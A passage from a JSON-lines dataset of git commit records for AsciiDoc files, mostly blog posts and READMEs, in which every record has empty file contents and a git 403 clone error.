2016-07-03-Test-Post.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-03-Test-Post.adoc","new_file":"_posts\/2016-07-03-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3695c0fdfda415311e60f81ae7645f88c6a106de","subject":"added examples for refactorings","message":"added examples for refactorings\n","repos":"moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan","old_file":"leguan-base\/src\/main\/docs\/overview.adoc","new_file":"leguan-base\/src\/main\/docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moley\/leguan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b31468be464d12a9e32228e585d4933c63b1924c","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fcdf915c839b4ec865f9b866c68fd5d771543fe","subject":"Update 2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","message":"Update 2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","new_file":"_posts\/2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6a948969aa37b533503b3cb40958c093b61b2bc","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd11f0570c22583b98187c024b01abe19406343c","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"731e120104641ce984400298bad485e4bb776c3a","subject":"Update 2015-06-08-A-remplacer.adoc","message":"Update 2015-06-08-A-remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer.adoc","new_file":"_posts\/2015-06-08-A-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"061a68849165f50f1f384709aef2f1656fbfb084","subject":"Update 2015-08-03-Hello-World.adoc","message":"Update 2015-08-03-Hello-World.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-08-03-Hello-World.adoc","new_file":"_posts\/2015-08-03-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ffb67de42686550ec20795e6d02f7d2e62ebacd","subject":"Update 2016-09-01-Swift-Tuple.adoc","message":"Update 2016-09-01-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f0f12b919a3f79ca313ed3c24bda93b6563a049","subject":"Update 2019-02-28-Normscharfe.adoc","message":"Update 2019-02-28-Normscharfe.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2019-02-28-Normscharfe.adoc","new_file":"_posts\/2019-02-28-Normscharfe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e9ddb42525677d7cb85577bea049d94955afeb7","subject":"Update 2015-06-30-FW4SPL-on-the-roads.adoc","message":"Update 2015-06-30-FW4SPL-on-the-roads.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-06-30-FW4SPL-on-the-roads.adoc","new_file":"_posts\/2015-06-30-FW4SPL-on-the-roads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff5c506b68da3bab2a87f526f2140d58e2c70d5f","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eefa11d6308a7518c75801f8b85b120465212414","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cbaa579f6331dab827044179f268f94bcd28eb2","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb16c66aab56d715aa4739fe35f5ee13de17fdd8","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e7854d816f069575006c95d5ecb8ab02acd15a2","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6ca0d1b1157971134bb180d36ccdd6ca30606af","subject":"Restore old image","message":"Restore old image\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa43b6b770ccb1c608ebc475c384af422604ac13","subject":"Add readme","message":"Add readme\n","repos":"thee-l\/notetaking,thee-l\/notetaking,lukesanantonio\/notetaking,lukesanantonio\/notetaking","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thee-l\/notetaking.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"077cc5b256cdbb50e5dbcf9cc8ab717c10b751ca","subject":"Fixed broken SmartImage infos","message":"Fixed broken SmartImage infos\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50eabebfff5553a38b6895912d66c28324590d38","subject":"Added maven bage","message":"Added maven bage\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4183eae9f83f95e9b90e05860ab7312710d87697","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91411ce32b2a6e176a62e9eed70685cbe8df475b","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05da67d1d23e4e7613367271af35cefd4c20a45d","subject":"Update 2016-04-04-Chairpersons-Chinwag.adoc","message":"Update 2016-04-04-Chairpersons-Chinwag.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ce35dbadbd59e5e59621f281af9801a9a75e557","subject":"first version of the introduction chapter","message":"first version of the introduction chapter\n","repos":"BenFradet\/spark-ml","old_file":"intro.adoc","new_file":"intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BenFradet\/spark-ml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67e997b42975a0e7edc75857694da3c6f305ce07","subject":"Update 2016-11-22-Test-Post.adoc","message":"Update 2016-11-22-Test-Post.adoc","repos":"Imran31\/imran31.github.io","old_file":"_posts\/2016-11-22-Test-Post.adoc","new_file":"_posts\/2016-11-22-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Imran31\/imran31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"881ff8c052c7b22fc45a7d1d6cfcc3a61568c61c","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e58988b1f59dc182c5b59d3bd37c909b083cf1be","subject":"Update 2016-08-10-Test-post-2.adoc","message":"Update 2016-08-10-Test-post-2.adoc","repos":"matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io","old_file":"_posts\/2016-08-10-Test-post-2.adoc","new_file":"_posts\/2016-08-10-Test-post-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthardwick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af002a6a4e7ee71bd582dda68c0835f9ac9ead1a","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e1542ee4a17767bcd7a33a85e9786ee97f02162","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e94056e1c199c3c419ee5cc745d3d6c87ed800b","subject":"Update 2018-12-01-Random-post.adoc","message":"Update 2018-12-01-Random-post.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-01-Random-post.adoc","new_file":"_posts\/2018-12-01-Random-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44900eb3ebdb9adf90ce936856a18ef101b61f10","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"648700e9910c43ac164efc050ef4acf503cb77f7","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f41fe9c1009aa3f5afc9b70a4b3ab44d542caf68","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a39e5141d244c2166816665bf2033131e9d770d","subject":"Update 2018-04-06-Sala-de-Chat-Privado2.adoc","message":"Update 2018-04-06-Sala-de-Chat-Privado2.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2018-04-06-Sala-de-Chat-Privado2.adoc","new_file":"_posts\/2018-04-06-Sala-de-Chat-Privado2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05be23b5cbc34bc480c14da6b53e4cda9dd99298","subject":"Update 2015-10-22-Test.adoc","message":"Update 2015-10-22-Test.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-10-22-Test.adoc","new_file":"_posts\/2015-10-22-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc2789b46b0c046b6c8fbb3598bbbd1fe6bffa5c","subject":"Update 2016-01-01-Test.adoc","message":"Update 2016-01-01-Test.adoc","repos":"JacobSamro\/blog,JacobSamro\/blog,JacobSamro\/blog","old_file":"_posts\/2016-01-01-Test.adoc","new_file":"_posts\/2016-01-01-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JacobSamro\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"537419132fc4866f1a9d353cbf4c9c691b9890ec","subject":"Update 2016-06-08-test.adoc","message":"Update 2016-06-08-test.adoc","repos":"Astrokoala-Studio\/hubpress.io,Astrokoala-Studio\/hubpress.io,Astrokoala-Studio\/hubpress.io,Astrokoala-Studio\/hubpress.io","old_file":"_posts\/2016-06-08-test.adoc","new_file":"_posts\/2016-06-08-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Astrokoala-Studio\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5864870b013fd9a3d426ebe62d1dfb0a7d4f34a5","subject":"Update 2017-03-12-Object-Pools-revisited.adoc","message":"Update 2017-03-12-Object-Pools-revisited.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2017-03-12-Object-Pools-revisited.adoc","new_file":"_posts\/2017-03-12-Object-Pools-revisited.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64cc0b4f5577a4cfc7bf24c952dbd669adaff2d4","subject":"sources fix","message":"sources fix\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"26224e05c77c47c3399a8091e114e9e43da1dd96","subject":"Update 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70bee2eb6e978475557aa42e3116ab79c3134fc1","subject":"Update 2017-07-18-Episode-107-Sounds-Hard.adoc","message":"Update 2017-07-18-Episode-107-Sounds-Hard.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-07-18-Episode-107-Sounds-Hard.adoc","new_file":"_posts\/2017-07-18-Episode-107-Sounds-Hard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0cc696a0d7efa80dbe3429d7bc6b349c059bf95","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38bb86cc8c8e1d00d38fa7f3218bf8a78cb23914","subject":"Update 2002-02-02-NCMPCPP-on-OpenSUSE.adoc","message":"Update 2002-02-02-NCMPCPP-on-OpenSUSE.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2002-02-02-NCMPCPP-on-OpenSUSE.adoc","new_file":"_posts\/2002-02-02-NCMPCPP-on-OpenSUSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"629d8b6d3fd8355c40f8ad176b14840c96feb788","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a27f2a7415fb421649bd5522f8474658703b506","subject":"Remove trailing whitespace in README","message":"Remove trailing whitespace in README\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c6e404f79fb58aca5b476721bf6b700b2cd1be3","subject":"add Dutch Clojure Days event","message":"add Dutch Clojure Days event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/dutch_clojure_days.adoc","new_file":"content\/events\/2016\/dutch_clojure_days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cb6d02cc117d926887bcc8c8efe06acafab97214","subject":"Create fr\/les_fonctionalites.adoc","message":"Create fr\/les_fonctionalites.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"fr\/les_fonctionalites.adoc","new_file":"fr\/les_fonctionalites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"5f1b867158b134aa26d3a3f7def1a82fbacef1c4","subject":"Update get-settings.asciidoc","message":"Update get-settings.asciidoc\n\nFixed docs for filtering index settings in get-settings API\r\n\r\nCloses 